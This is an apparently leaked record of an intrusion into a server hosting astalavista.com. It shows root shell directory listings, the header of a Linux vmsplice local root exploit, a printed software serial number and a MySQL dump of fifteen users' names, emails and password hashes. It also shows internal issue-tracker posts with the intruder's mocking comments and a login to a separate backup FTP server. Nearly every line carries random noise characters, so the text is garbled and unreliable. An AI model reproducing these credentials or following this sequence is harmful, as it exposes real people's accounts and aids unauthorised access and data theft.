drwx—— 2 com com 4096 Jun 4 04:04 backups D" B* M6 ?( J# \: z
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
2 Q4 ^4 S. s3 \& sdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
5 w. F* I; e2 P3 @* v% A# y, `-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
+ v5 d, [0 G& b3 t7 P-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
: J5 u) M4 o: y1 L8 D-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
s0 I( B/ m7 c' x9 K9 X-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
4 G& ?- V4 ?1 P8 v) b; j: udrwx–x–x 3 com com 4096 Jan 29 2008 domains# Z9 A2 p/ q( K) X p, d
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
4 q+ f1 B) B* h" a6 @* Pdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap: w g% A( r0 s+ x: o5 {" l# @
-rw——- 1 com com 69 Nov 18 2008 .lesshst
( X. E/ O; |9 D( s+ |6 G. y- zdrwx—— 2 com com 4096 Sep 24 2007 mail. q9 H% P! J; g
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
9 W& ]) E2 _7 f, L0 ]7 C) I! Adrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp. j/ v. g$ f" k4 N$ I
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html: J* D: A# j+ d! c: C# h
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow0 S. W+ U2 e/ A0 l* ], J- l/ m# `; H
drwx—— 2 com com 4096 Aug 26 2008 .ssh
& |) n- g6 A% n; b( q-rwx—— 1 com com 8515 Feb 10 2008 t
. \& o# m* T9 e. z* Z7 B8 Z B-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
, i0 H, s+ a! A$ Z- Y. g. |drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
! f9 X) q" B- ]5 h9 O-rw-rw-r– 1 com com 617 May 20 2008 .toprc
; B( @# S# I- I0 q% z-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql5 Z" a' S6 k# x
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
- D6 f& i+ K. W4 f-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
$ C. e, I' v y! E. L' b$ p' t9 l8 V' `3 j, R+ ^0 ~! D
sh-3.2# head t.c0 s3 d/ V& Z" c, T- r/ S: c
/*
, k4 \5 X( b$ y- i/ H% B0 M* jessica_biel_naked_in_my_bed.c
0 |4 P( R! O: u0 _2 J; d: Y*, N" n# d# F& k* i6 M( ?! k
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
5 Q9 i+ \ J/ [. J1 \. m# J b* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
" ` B. I) [. j; M- g8 [" D) w* Stejnak je to stare jak cyp a aj jakesyk rozbite.
7 a9 L6 t% D9 w' X' v) X" |0 [*
2 T! g0 Q3 i, G* Linux vmsplice Local Root Exploit
* R7 G8 X9 V' S, ~ {# ^# {* By qaaz5 e! a; @+ ?0 ?$ ^
*
( E& _" m1 |7 O5 @, Q% t& G! k5 n0 J! b. H/ T) B$ @: F
sh-3.2# cd /
% x: E0 r8 n' ?3 y( u2 `3 G Ysh-3.2# ls -la
5 }1 L3 Q7 _7 m' V$ T2 Qtotal 360
9 V! I" I4 A. O+ f; M& S$ Tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
& K% G% ^6 M! K6 A/ Ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( ]* h( e+ ^. E/ M* g" P-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
# ~! {; {2 h. e4 h2 q0 t-rw——- 1 root root 10240 Jun 3 02:39 aquota.user; e5 D2 B! e% J% w
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db/ R2 @. ^! E7 M, `3 D' k
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
% m) s) }! d! l o2 p-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
; T z% H6 e: [7 R4 Pdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
+ y( ~- |7 W+ }' j* F* O# L' [drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
" t' U7 x. ^0 u# Z% d/ I* Y7 Xdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot; s5 F# d9 [" j
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev/ Z4 @3 l( W% U4 s, F: P5 Y& I8 ?
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
# m' t0 B1 C2 v( Y, ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
3 d; k1 H! M' z, G& g, S x; u-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
3 @& r( X. U+ k+ v+ j5 y. rdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib0 b( k/ c3 y4 P
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
5 C) p0 i5 C2 ~6 [0 D. s! Ddrwx—— 2 root root 16384 Sep 11 2007 lost+found% r9 ]$ j- ]; U$ B+ `' b7 `2 U5 }, c
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
/ I5 K0 E' ~* tdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
& n- A3 m0 U5 T9 q- gdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt" A; X* Q# s% l" y6 u+ ~# x
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg9 b8 [* I x/ W" c* i, l
drwxr-xr-x 2 root root 0 Jun 3 02:43 net7 w' T1 j2 _: d2 U9 r1 `3 Z
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt% D) [; L' T- b
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
: v: M& b8 O" B& H, edrwxr-x— 15 root root 4096 Jun 4 08:40 root# t5 P5 J0 x/ o$ I/ m- b
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin7 U& G1 Q) t4 k. n3 M# U
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux4 f& x7 ^; C! i2 I# y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv) Z# ?$ m4 @8 o3 A4 e/ e/ G
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
5 ~1 @7 O2 N' x5 G( b+ `5 @drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp- [6 l0 v# P: N) r* ^
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr) z. X3 P4 s" U8 s$ k
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var/ O: C, B) u8 z7 N# M
/ T$ H! n) G( p7 ]5 n ?( vsh-3.2# cd opt
9 b* ?( V0 V3 _& o- T: n; Y7 Qsh-3.2# ls -la
8 F8 z# b( I |! a+ ^total 20- X+ n% Y0 ]3 ~7 J! H
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
/ A' F+ |/ J% x2 M, ^* Kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 f& W! P) Z8 W( }drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws9 T3 W! q# t3 j' B1 d. f
; h6 j; ] b# }: jsh-3.2# cd lsws/' Y' L1 D& A* T8 ~0 ]8 b
sh-3.2# ls -la
' L. L( A8 d( W4 X. |8 B0 @total 108# s# s4 U' m! F6 w2 O7 i+ j8 S4 S
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
- D& [4 H4 p+ U% M idrwxr-xr-x 3 root root 4096 Mar 11 17:56 .." ]$ F5 G6 S9 X0 q% j: c" h0 q) m
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
2 V' t, A! ]/ A0 Y& [( Zdrwxr-xr-x 13 root root 4096 May 29 15:10 admin4 C% p- v% G) i+ a( y9 O
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate% U5 `2 u9 z7 `8 Y
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
3 [9 ~& N1 u% O8 w t6 C8 h( fdrwx—— 4 apache apache 4096 Jun 3 02:43 conf* H9 U! P4 W9 {- ^
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT9 S. b% ~. R2 h r9 P$ j! ^
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
7 X# @6 `6 O/ G, t8 ddrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
7 r; h% p/ T1 e/ V6 Qdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
2 `$ N3 S( k% R/ W( Y L1 F( k* f-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
# n. o6 c4 F9 Y" R" T-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP5 V- H8 A, f5 ~! w$ G/ t9 h! Z4 u" R
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
# H5 f1 i, `1 n! e+ Q5 A8 p% A. }& A, q-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP: _/ e3 v: p) k+ A4 @ w' z6 J
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs: m+ K6 U# E; f) c( j; f( B' g! f
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
; ]7 i) u* A' Y' ~3 F# D* a% Ldrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild- l. |# g7 C3 w, b! l0 k9 q
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
# V) c& j. K4 N- j o# `0 b% ?8 ~-rw-r–r– 1 root root 6 May 29 15:10 VERSION% U& i, H$ _$ n& m2 v% z% ?
! j7 a' Q+ C, d# m- L5 p
sh-3.2# cd conf# T8 b* F0 c2 P3 d1 r( A9 C" P
sh-3.2# ls -la1 `; u1 x7 `, L" ]" P6 l
total 48
% n6 z) q- a) }7 o# Qdrwx—— 4 apache apache 4096 Jun 3 02:43 .
( ^, B& P% j) n# Adrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
$ l3 \/ w4 s( e* M: \/ x! S, Ldrwx—— 2 apache apache 4096 Mar 20 2008 cert. B+ d1 Z0 u+ B7 x7 d( f$ _
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml% |2 k3 T. g# x$ ^3 K) r5 I
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
. O2 K6 i* C8 a5 n. {% X, i* @& R; K-rw-r–r– 1 root apache 0 Jun 3 14:11 .last2 \2 a& ^, s' G: U. g! S
-rw——- 1 apache apache 256 May 29 15:10 license.key7 F9 o! Y* j; e" {& D$ X" [
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old# y b4 j1 j- T3 ~8 h7 h+ z- j2 K
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
' n$ d0 |& P7 z: a. X) `" z2 e-rw——- 1 apache apache 20 May 29 15:10 serial.no
* K2 k3 L+ B9 w* A) v# u% l0 k% jdrwx—— 2 apache apache 4096 Mar 20 2008 templates7 x9 _' h! ^" H! ^
; j3 U8 l2 m6 T+ A/ L" N$ O2 B) v
sh-3.2# cat serial.no
$ |, C9 G+ A/ u7 O, R5 m. q, qIbDl-oVsO-CKqL-wVRa! W' \) d! H# {9 z. f, v% A
. \9 |+ g! p5 v7 }3 ksh-3.2# mysql
3 J1 ~3 Z6 s$ Q+ cWelcome to the MySQL monitor. Commands end with ; or \g.
9 y$ k( c9 I- T4 h1 S/ |2 w5 s0 t/ |Your MySQL connection id is 286844
$ [9 n* V9 @. }( H; ]( `" ] c( r- J. iServer version: 5.0.45-community-log MySQL Community Edition (GPL)
0 E& h6 Q' a4 a* K E( m4 I9 t: V/ a* K5 ^! J, G5 z+ K
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ ~7 b2 A1 F1 T5 c* ]- S- O0 z) S( u# t
mysql> show databases;' t/ Z2 f0 O% f. S$ q
+———————–+
; _: K" D5 d; W2 H5 ~- S( K| Database |7 i/ ]* I& i& q: D
+———————–+
. S- J* A1 n8 w, N4 N# Y3 q+ Q6 w| information_schema |0 v* }% k6 f9 ~5 W$ r
| astanet_ads |/ @3 y* c/ x$ ]: c% x5 x2 A2 l2 j
| astanet_mailing_lists |
! ^, s+ V( `& v8 r. A! U3 r% l* {| astanet_mediawiki |
2 E* q1 h; `6 Q2 h| astanet_membersystem |
7 ^( d4 F9 t: K' Y| com_contrexx |
/ S9 K3 O( ~' C3 G' N; P: h& c- M| com_contrexx2 |
2 E, U# V) b- V/ E7 E7 a+ R9 {: k5 Q| com_contrexx2_live |& i/ n3 }5 t# c1 c8 V/ X
| da_roundcube |
" g- t1 ]4 H7 S% T* K" A| dolphin |
- \, R6 a) n8 o. ~. || ideapool |+ }6 t% n( h0 u3 R, g2 F
| mysql |0 j T$ H3 c& Q8 c
| test |7 `. a3 T- n6 O6 [9 P3 D9 h+ E2 r
| yourmaster |
1 t9 i- F& X6 v m+ Z- ^+———————–+
; i5 Q6 H$ j, e, e; [+ t# b14 rows in set (0.00 sec)7 U9 I2 S+ y; K: H7 @
$ _# {+ t2 P0 c2 l/ ^# B6 c0 u U: @mysql> use ideapool
, `% b6 ~" T+ N0 RDatabase changed
: A) j+ S$ z6 Mmysql> show tables;
2 j( e1 u8 I: F# G! }& ]( @8 U t+———————————–+
& G3 J$ I$ W* E9 r9 e4 H4 `- t n| Tables_in_ideapool |. Z- |% Z6 O; S) G) t
+———————————–+
& u$ m% o; x" J3 C* Q7 Q| eventum_columns_to_display |, H5 D* S7 G: o: `
| eventum_custom_field |
% r/ m6 G# D4 K6 g. W+ r; ]| eventum_custom_field_option |
7 u: @& q* k- n2 U8 J7 N2 o- \| eventum_custom_filter |
: c( v0 x2 N" E* m| eventum_customer_account_manager |( I8 b* X2 w, t+ N8 @# v
| eventum_customer_note |
/ e; }. s0 ?) C| eventum_email_account |
. a% L& N, t/ q* j1 d6 h| eventum_email_draft |6 ]/ U' E& _" x2 B
| eventum_email_draft_recipient |/ D& U1 Q/ Q e/ ?" N) Y
| eventum_email_response |
' P, z( S. X6 u3 L' Y% h| eventum_faq |
: A3 C f; \3 c( I| eventum_faq_support_level |
, e0 C5 K# j) p' S| eventum_group |
, D6 O# ]$ G( m' j2 E' A| eventum_history_type |
! P: p- t1 m( d. {| eventum_irc_notice |
) G6 T# I+ h" V8 X, I$ {9 N Z! r| eventum_issue |$ u3 V, q7 k' Y& ~2 a; [
| eventum_issue_association |
8 r8 A: b8 g M- ^+ R| eventum_issue_attachment |: X; d! b% x" S8 N1 y
| eventum_issue_attachment_file |2 Y! R) {( k- u. Q( ?1 N
| eventum_issue_checkin |
# C y9 ]8 A9 h5 L| eventum_issue_custom_field |
8 C& a% W- l; K% }4 H& a| eventum_issue_history |/ |) K) x. q/ W- j
| eventum_issue_quarantine |
& G M; f$ ]4 v5 c7 x5 b| eventum_issue_requirement |6 o% t! n6 W7 r: _/ N. B* N
| eventum_issue_user |
: K8 O4 v# @: W1 g- c& {& i| eventum_issue_user_replier |6 t5 Q, B0 F8 ?6 ^. i+ o A
| eventum_link_filter |
7 @2 m! ^8 Y8 r' {; J" ^2 D| eventum_mail_queue |
7 R% b/ G& f( C9 E| eventum_mail_queue_log |. Z! N7 y0 N9 U# P0 o- Z
| eventum_news |
3 t+ Y# o, e7 V% I' d) f4 y3 S6 }! B% C| eventum_note |
4 t2 V. d" c Q4 h9 s| eventum_phone_support |
- \6 d) q7 Q" y: d+ \9 ` M| eventum_project |5 D8 B9 G, p4 L9 W1 p# g8 y& z4 f
| eventum_project_category |
% c' O) P9 g$ u, _5 C. A5 W| eventum_project_custom_field |1 Z% d- D. L) i% K
| eventum_project_email_response |
1 o# ^ | f% }) p- p| eventum_project_field_display |4 j3 ^. u2 s9 n9 X
| eventum_project_group |
; W! e& p; G/ ~5 B, j| eventum_project_link_filter |
3 Z0 q9 O9 l _. a/ [' a1 Q| eventum_project_news |
9 [1 M2 w- s ]7 _/ E| eventum_project_phone_category |) F6 p, X( k* V# s
| eventum_project_priority | Y7 X" s" d) O! b# o
| eventum_project_release |
% E+ s1 r2 p% D* _5 g. X0 M| eventum_project_round_robin |
5 l' v4 R8 ~1 A( l, y| eventum_project_status |
+ z/ S+ c, x8 A, U| eventum_project_status_date |/ C9 s; z( f4 V# {
| eventum_project_user |
3 y& [& K) L4 j6 c# `9 S8 l+ Q| eventum_reminder_action |+ r' L" L4 g2 `
| eventum_reminder_action_list |
* A% @; Y+ B% m* h| eventum_reminder_action_type |
4 C2 n; P/ a$ i! T O2 @6 \& c| eventum_reminder_field |
+ F- d2 x4 b; R" ?) Z5 H| eventum_reminder_history |
' b- ]) L2 e1 V' b9 ?| eventum_reminder_level |
; ]8 h7 X6 K+ Z5 O( T* O| eventum_reminder_level_condition |/ w# f! _3 H# o; R) v: F9 n
| eventum_reminder_operator |$ b" S" a- _2 v$ N% w9 \
| eventum_reminder_priority |
8 G0 Q# p& {5 b# s! \, O| eventum_reminder_requirement |: e% p! R! T7 t- `0 `' L; z- |" [4 o
| eventum_reminder_triggered_action |7 U8 r B& b" a9 M
| eventum_resolution |9 S4 U5 s5 d" z% O
| eventum_round_robin_user |
0 G. V# R% E8 r9 ~+ Y5 J/ B/ t% n| eventum_search_profile |
3 w4 l. Y3 b8 c% E. m* N U' Q6 H| eventum_status |
+ ?; W! W. ]' F. f. N$ T0 J( E| eventum_subscription |
5 Q0 k" N( Y6 ]( ~| eventum_subscription_type |
7 l. h& t$ }3 ~( z" f6 C6 Q| eventum_support_email |% M0 _* ~: i3 z ?# K9 ?
| eventum_support_email_body |, E% u2 f+ w* I, |, H Y' R% i
| eventum_time_tracking |. S: A5 I( `9 M/ k+ z
| eventum_time_tracking_category |! F1 C' m6 X$ S; L- [7 {
| eventum_user |, B5 Y; f/ M$ O1 ]7 o
+———————————–+
: v6 Y6 U: S+ }8 X69 rows in set (0.00 sec)
+ e8 b h# C: j; I: J: O1 G0 J% _: R5 U- r; H+ t0 s" U
mysql> describe eventum_user;" U4 Q* c& f( |9 l3 U1 o& x% x8 s
+————————-+——————+——+—–+———————+—————-+
; q! M! G; v4 p6 @/ y| Field | Type | Null | Key | Default | Extra |
8 B# V5 `3 M8 t, c: x7 o. p+————————-+——————+——+—–+———————+—————-+
! H) }. f2 L- E: u. q/ \| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
# F1 u4 J! o- L! h/ N, U| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |: G! M8 C ?# L7 R9 q
| usr_customer_id | int(11) unsigned | YES | | NULL | |
$ h1 `7 l: |& P| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |) E" E n# h" ]8 Q9 j) T
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
; V4 ~) U; T. S) c+ U* ^9 V" H| usr_status | varchar(8) | NO | | active | |: K% |' q' ~; ]' u: D7 z
| usr_password | varchar(32) | NO | | | |
1 z _! r4 u$ Y| usr_full_name | varchar(255) | NO | | | |! }4 b% v. i9 a/ b( T% i2 l
| usr_email | varchar(255) | NO | UNI | | |
/ f- C, V. M# O| usr_preferences | longtext | YES | | NULL | |
* a& \9 D3 m1 n" X* m| usr_sms_email | varchar(255) | YES | | NULL | |& r' X: M6 }5 v; h* @, q
| usr_clocked_in | tinyint(1) | YES | | 0 | |
0 p7 r8 X( V6 s| usr_lang | varchar(5) | YES | | NULL | |
7 s1 m4 V; P( V2 b! [5 N) c0 _+————————-+——————+——+—–+———————+—————-+2 L; K6 w+ R5 l3 G
13 rows in set (0.00 sec)
/ X" k+ T* {0 G+ A: _$ l
( m m- B$ D) `4 F0 H* smysql> select usr_full_name,usr_email,usr_password from eventum_user;
% L: T0 s- M a( u8 W+———————-+——————————-+———————————-+
2 }8 b$ F0 t" r2 @ n, ?| usr_full_name | usr_email | usr_password |9 y, }$ o9 f! ^
+———————-+——————————-+———————————-+! n* M: i* D4 i5 s' z6 p- @9 y& a1 P0 B
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |- @+ ~% e1 h+ g. e1 p" @
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
- m) n3 t E" V( _| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
4 C! b0 ^0 g/ a7 I. c/ s% x) v3 B| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |3 W( M& Q8 t a4 W# f! v
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |9 {% M; T7 R" T: o! Y
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
4 W2 J: t0 g6 `+ x; o! }: a| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |6 ~5 I( f* w/ F% ]+ {1 G
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
+ A5 G7 F" \0 ?| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 T# i, u5 U, E| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |/ P# ~4 B& C9 ]
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |/ v8 n: h/ ?, l& Q0 Q
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |0 w/ O" K0 F# R7 k0 D
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
) m A, p. ]% `& n7 || usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
& ^& d" d% \8 p1 B! x4 M2 f1 m6 W| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
! H! P' ?. A9 W3 D' e+ Y1 M/ W+———————-+——————————-+———————————-+
3 k* J( d+ \. Z7 ?15 rows in set (0.00 sec)
& g O3 u! M% b
" d( y3 Y. o) Amysql> select iss_description from eventum_issue where iss_id = 43;' B9 A* |; U! q* X$ D! ~
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+" G5 r6 {( z g0 ?2 {9 @3 n/ m
| iss_description & t5 H" o" ~" |1 C) A
|
/ h, A% I( D- u+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+5 Z) E( m1 m- W- H. K
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be' ?$ B1 F' J/ h/ T' x9 m2 q
connected for 90 mins… 120mins… so what i propose is something like:
. s L8 F/ X( i4 h( l2 u8 P% p链接标记[url]http://www.surfthechannel.com/[/url]
9 A) D, @4 K# k8 Hsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
% y3 P$ k7 H4 Jlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t! w/ y$ }0 d# [. L5 A; R1 e, r. z
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off/ V7 r8 a, z( j% `
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…$ r. L3 ^1 u9 ]- w$ h( [# w: z- i
# ~' c, y2 s! ]* s' z/ S
We could also put advertisement during play on the flash video player itself… extra $$…
1 I& ?% o+ P( g( {, E/ ?) Z. Y# g! _
By sykadul |7 Y+ O1 e0 ~( r3 A
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 z1 w* O1 [9 x& {' d
1 row in set (0.00 sec)
6 i+ d: A, q7 T: S9 C( b5 l0 x' M4 j0 |: G
// Money and extra $$ is all they care about. remember that.' I. G6 G) i) [
4 ]+ ~; l" Y* c" F! Fmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
7 M) Y# l' h0 L" n! m+————————+——————————————————————————————————————————————————————————————————————————————-+
' ^5 o0 [( E( M9 G, r3 t. m| iss_summary | iss_description + m/ K# R ^% q* p( W7 Q( U
|
; `' v/ @$ N4 A! X1 A8 I7 ]4 x+————————+——————————————————————————————————————————————————————————————————————————————-+: I. y& _% s" }4 i
| Forum for REAL EXPERTS | Hello,
+ B; J0 t: {1 ~$ r& j: P: E0 Z+ ]1 z g) _9 |0 S, Q+ P
Ishtus and I,) {: }/ y2 [% q. R
' Z* b5 E9 e$ a: G3 T5 k& _
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
w! B9 g9 ^* e/ S/ l. zONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..; `# x4 `( X. k/ S! D+ ?
' B- M+ j i3 L" k$ {0 EOne example a friend of mine from coresecurity.com!; C1 f- s9 [/ A6 U0 c" d0 X q( g
1 O8 x5 j! A1 {0 V& d' y8 zWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
; ^/ W( l3 H4 g ^0 K6 y! t/ N3 q, }' u+ b3 n* q
|
6 v. _ k1 S! H# ]+————————+——————————————————————————————————————————————————————————————————————————————+3 [/ v1 b1 Y+ t: V' Z4 V
1 row in set (0.00 sec)- m9 J# H& ?: i p( n! w
2 J7 v5 S1 o$ k# b x+ ?// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
$ g( i4 A6 U/ M4 Z1 @: c& d" }# M& u) ^/ s' W1 z( u2 n4 y( d. |
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
. r6 `- x. `% X: A5 X+——————+———————————————————————————————+2 m! U: q0 R# V4 R
| iss_summary | iss_description |
, W% v/ p( h$ Y5 B; R2 W+——————+———————————————————————————————+6 X' ^- q x! A1 [
| Website guidance | Virtual Girl which guides you trought the website.
8 q2 F2 m6 N& t, H+ E, f
$ m0 `2 @1 [& ]1 \5 m: @We need a girl with who you can ( talk )!!!) B+ ~9 \0 ^$ w5 p( Y$ o3 k- D
Also for the News!
0 v P9 E( A/ ?! P* WSo my suggestion is a girl who read you the news loud if you like!
" a% |1 L. Y+ o/ p- b3 Dyou can choose between read yourselfe or she read it for you or both!6 R# Q& y& r& |8 F O
( Z" L0 A+ i5 V5 t2 q ?
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
% G' @$ t! _' V" g- n
, y! s* @5 E, n! y& i IHave a look on the example girls!!
& p9 M/ c8 e+ l, H& r
0 S# J7 [4 v: I链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url], U7 f ~2 A0 f" D) e& I
1 P- V/ N3 c8 r2 for that. Q) |3 b8 E( y0 Z$ }2 M
0 o+ }8 R( }" t2 g! F- |8 P链接标记[url]http://www.yellostrom.de/[/url]/ r3 @( E, e. i/ X& Q% |
9 u$ V5 W4 l+ n5 P2 q8 P|/ F, F1 E& A5 Q7 ^. L
+——————+———————————————————————————————++ @6 L; H9 k7 E- v
1 row in set (0.00 sec)
h2 o. w% `3 F: l+ W/ \3 D: T; c/ e+ X8 c4 ?5 U, d
// ha ha.
' H9 b0 { h- y- H! l e& J: g" {+ u2 [
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
, F1 \1 b9 p m, {+————————–+———————————————————————————————————–+
9 |: @. I' A$ V! W| iss_summary | iss_description |
+ m' I- E8 i: B- H- w; R+ I7 @+————————–+———————————————————————————————————–+2 a. S- \4 b7 C6 Z7 J, x
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |& j! W* f- [/ U0 d0 `4 _
+————————–+———————————————————————————————————–+2 }" J: v2 f( G; o" s4 N1 n6 v4 w
1 row in set (0.00 sec). [# ]1 P. j" y! |
+ _% _, M; J' o- s" W" }// LOL." ~: I5 Y& [. n5 z$ \# v' R! e
+ g' ~6 ~8 y6 A% cmysql> exit# v8 ]6 O9 h+ w- _; V
Bye B6 T/ t! s3 P2 E ~& y* c, i
0 O' g. M- _6 S( n
sh-3.2# ftp 212.254.194.163
) i# V3 M- w; w2 o( f2 t7 FConnected to 212.254.194.163.
V1 ` ~) Z$ D) z/ [6 m }9 ^220 BackupCOM_VW FTP server ready.
" d8 t3 i7 \4 Q: O ~+ t3 P% r504 AUTH: security mechanism ‘GSSAPI’ not supported., f' f$ {! u. `
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.5 i. \ ~- C% D& n; O
KERBEROS_V4 rejected as an authentication type$ g ^* h& `1 o
Name (212.254.194.163:root): astalavista.com8 U' }# _; y( I/ P$ U
331 Password required for astalavista.com. | [/ X, r& z$ l A- b- Q" s. H
Password:/ y3 Q' T" w4 ?0 c- w3 G# ]- C8 L# i
230 User astalavista.com logged in.
$ V9 j- e& b$ KRemote system type is UNIX.
' o) d$ o) d3 I1 |# t! K9 E( D% cUsing binary mode to transfer files.
3 d+ |- L& P- M8 j! b3 Rftp> ls -la: E0 Z( k! K3 t- x! M
227 Entering Passive Mode (212,254,194,163,2,188)% L% x: m! W: \ O1 d5 F* z# v
150 Opening BINARY mode data connection for ‘file list’.
5 r8 g9 C# J: I# @$ f: {dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com' P7 d5 e+ K% s* X
226 Transfer complete.
5 q# y! Y: T3 q7 Z) |: |8 P6 u cftp> cd astalavista.com" c9 L# F7 }3 `7 J' {+ O0 b$ z
250 CWD command successful.$ u( _8 X; p- v& M! |* _$ L$ x
ftp> ls -la% x# \8 i1 M) u! Y
